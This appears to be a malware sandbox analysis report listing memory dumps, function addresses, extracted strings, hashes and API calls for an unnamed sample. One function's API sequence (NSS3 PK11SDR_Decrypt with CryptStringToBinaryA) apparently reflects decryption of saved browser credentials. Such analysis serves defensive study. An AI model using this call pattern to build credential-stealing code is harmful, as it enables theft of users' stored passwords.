Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 95487bffbcac408434449b398b1f7af477272e9165a6de73a5b273515f9e02ee
Instruction ID: f1ccb4e7fe07b3e30e433931335f25d1e3f7ef307b6edcb8040b58080be41e2c
Opcode Fuzzy Hash: 95487bffbcac408434449b398b1f7af477272e9165a6de73a5b273515f9e02ee
Instruction Fuzzy Hash: 08F18271814118AADB2DEB64CCA5EEE7338FF54300F8041E9A41AE6591EF346B4ACF57

Function 00C6FAAF Relevance: 14.2, Strings: 10, Instructions: 1666COMMON

Download Yara Rule

Strings

Nc^, xrefs: 00C704E0
XYqm, xrefs: 00C70794
5u2, xrefs: 00C7021C
|~, xrefs: 00C70691
!?w, xrefs: 00C700D3
F<t, xrefs: 00C6FEC8
0VuO, xrefs: 00C70DAC
b6}?, xrefs: 00C702B4
C&o?, xrefs: 00C702DD
DX}, xrefs: 00C6FB8A

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !?w$0VuO$5u2$C&o?$DX}$F<t$Nc^$XYqm$b6}?$|~
API String ID: 0-869919665
Opcode ID: 8b1be751ec9203af183fdf24be3f1bc1b1cb3cbfa0ba7a4ef5028f866ff75335
Instruction ID: ee5df986492dfad95dabc6c71348d8588926428d8a06f83666e2e5d6e9858481
Opcode Fuzzy Hash: 8b1be751ec9203af183fdf24be3f1bc1b1cb3cbfa0ba7a4ef5028f866ff75335
Instruction Fuzzy Hash: 51B208F3A0C600AFE3046E29EC8567AB7EAEFD4760F1A493DE6C4C3744E63558058697

Function 008AC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
PK11_GetInternalKeySlot.NSS3 ref: 008AC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 008AC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 008AC8EB
lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
PK11_FreeSlot.NSS3(?), ref: 008AC961
lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 07147143aa177a11630a0b2c9d9e253904ae166cc3db73d2a1e00f3594281da8
Instruction ID: 0d21127f2ae59e4d74ec113baf6bcbfbe37d4fda758937ef6f8171aa271b5ac5
Opcode Fuzzy Hash: 07147143aa177a11630a0b2c9d9e253904ae166cc3db73d2a1e00f3594281da8
Instruction Fuzzy Hash: DA417FB590421EDBDB10CF90DD88BFEBBB8FB48304F1441A8F509AA280D7746A85CF91

Function 00C730A0 Relevance: 12.9, Strings: 9, Instructions: 1648COMMON

Download Yara Rule

Strings

Rs//, xrefs: 00C74406
y\?, xrefs: 00C740AC
FK{y, xrefs: 00C73955
1?o, xrefs: 00C732F1
8]n, xrefs: 00C73C14
+{Pt, xrefs: 00C744A4
iewOfFileFromApp, xrefs: 00C73105, 00C7313B
kyG, xrefs: 00C736BE
Q}, xrefs: 00C73CEE

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: +{Pt$FK{y$Rs//$iewOfFileFromApp$y\?$1?o$8]n$kyG$Q}
API String ID: 0-3957837317
Opcode ID: 79bf4db9546969fd99ca2c876797ba9edce4065093491a062edb07a3d7823bf6
Instruction ID: 4dd0a22a1b02d611c8299b1a1f2cb14d5e767885c2e5df85781f365caede6b34
Opcode Fuzzy Hash: 79bf4db9546969fd99ca2c876797ba9edce4065093491a062edb07a3d7823bf6
Instruction Fuzzy Hash: 96B216F3A0C2049FE7046E2DEC8567ABBE9EFD4320F1A493DE6C4C3744EA3558058696

Function 00C6C61C Relevance: 12.9, Strings: 9, Instructions: 1601COMMON

Download Yara Rule

Strings

`Ro>, xrefs: 00C6C986
Q.2_, xrefs: 00C6C79E
y@{, xrefs: 00C6D758
BJw;, xrefs: 00C6D3E0
AP , xrefs: 00C6C8BB
=^Z, xrefs: 00C6D0DE
.qU~, xrefs: 00C6C636
ffY|, xrefs: 00C6CE7B
kq>, xrefs: 00C6D611

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .qU~$AP $BJw;$Q.2_$`Ro>$ffY|$kq>$y@{$=^Z
API String ID: 0-2577483709
Opcode ID: 2bfd5612eb4f49231c1068b0f0fc4dfce6738eca27384143a9c38e1363c541b0
Instruction ID: faef27b97d2aadd463ee09951c9c0633e71fffa3779b5f6a4822ba121a599f3b
Opcode Fuzzy Hash: 2bfd5612eb4f49231c1068b0f0fc4dfce6738eca27384143a9c38e1363c541b0
Instruction Fuzzy Hash: 0FB216F390C2149FE314AE2DEC8567ABBE9EF94320F1A453DEAC4D3744EA75580086D6

Function 00C74C9A Relevance: 10.3, Strings: 7, Instructions: 1576COMMON

Download Yara Rule

Strings

[, xrefs: 00C74CE3
-5>=, xrefs: 00C75F10
p>m, xrefs: 00C75A84
fknn, xrefs: 00C75FF8
)O, xrefs: 00C74E22
\~, xrefs: 00C75FC5
Ace, xrefs: 00C75935

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -5>=$Ace$fknn$[$)O$\~$p>m
API String ID: 0-3493637771
Opcode ID: e4436a07299ecc0eac989788516fd6d07e7b13fa029023a0b08f4308da9b8322
Instruction ID: 770e5f5aa6c35179ea5c489b5701af31b37e095d2ce098a8de47c010edfb7f5e
Opcode Fuzzy Hash: e4436a07299ecc0eac989788516fd6d07e7b13fa029023a0b08f4308da9b8322
Instruction Fuzzy Hash: 5DB207F3A0C2009FE7046E2DEC8567AFBE5EF94320F26892DE6C5C7744EA7558418792

Function 00C67667 Relevance: 10.3, Strings: 7, Instructions: 1576COMMON

Download Yara Rule

Strings

6i*~, xrefs: 00C6795A
wC, xrefs: 00C676A1
UX}, xrefs: 00C6813A
8\~:, xrefs: 00C677EE
wC, xrefs: 00C67693
.zw, xrefs: 00C67752
8\~:, xrefs: 00C677BC

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .zw$6i*~$8\~:$8\~:$UX}$wC$wC
API String ID: 0-1377098752
Opcode ID: 0b0c42e8f0932145ecd1205df1f025c1e8c4e853f830cd6d61ed91a2269948d4
Instruction ID: 49566fac1a2d22ff3154662ba7fde1ac20933b04e92cbedfd027e3a7aea4781c
Opcode Fuzzy Hash: 0b0c42e8f0932145ecd1205df1f025c1e8c4e853f830cd6d61ed91a2269948d4
Instruction Fuzzy Hash: E4B2E3F360C2009FE3046E29EC8567AFBE9EF94320F16493DE6C5C7744EA3558458A97

Function 00C782DC Relevance: 9.1, Strings: 6, Instructions: 1609COMMON

Download Yara Rule

Strings

nFk~, xrefs: 00C78BE7
\,g|, xrefs: 00C78589
Yz, xrefs: 00C789A8
fd.,, xrefs: 00C7864A
_`oo, xrefs: 00C78C9E
g,}v, xrefs: 00C78F89

Memory Dump Source

Source File: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Yz$\,g|$_`oo$fd.,$g,}v$nFk~
API String ID: 0-376815048
Opcode ID: b3d61afd3b0f5911943f53553017a591fc9337c5ef08688e6a7421366b70d267
Instruction ID: d1e7797b2529cc40829ac68f4cdca6d561aacae9411e87ce615c818e29d41c81
Opcode Fuzzy Hash: b3d61afd3b0f5911943f53553017a591fc9337c5ef08688e6a7421366b70d267
Instruction Fuzzy Hash: 71B2E4F3608204AFE304AE2DEC85A7AF7E9EF94720F16493DE6C5C3344EA3558458697

